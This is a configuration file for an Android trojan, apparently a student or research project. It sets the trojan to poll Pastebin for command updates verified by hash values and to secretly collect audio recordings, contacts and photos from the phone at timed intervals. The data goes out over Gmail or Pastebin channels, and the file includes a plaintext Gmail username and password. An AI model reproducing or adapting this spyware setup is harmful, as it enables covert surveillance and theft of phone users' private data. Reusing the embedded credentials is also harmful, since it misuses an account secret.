#the following is the one that the Trojan will look for when he will look for configuration updates
current_hash_value=b7d4aa1d77909b86b4087329d4ac8
#the following hash value is the one that the attacker will put on the next updated configuration post
next_hash_value=bbnjsdnf434fdgb3f9dgfbkd8ffflkjg2dcg
#intervals between each set of collection
collection_intervals=7200000
#the following is the intervals for looking for configuration updates on pastebin (86400000 is 24 hours in miliseconds)
check_for_updates_intervals=86400000
#currently these are the available actions -> recorder,contacts,SMS,photos
actions=recorder,contacts,photos
#recorder action time:
record_length=5000
#mail channel user name and password:
mail_user_name=android.trojan.colman@gmail.com
mail_password=Vnfkkvknbvk
#currently these are the available channels -> gmail,pastebin,pastebinEncrypted 
channel_type=pastebin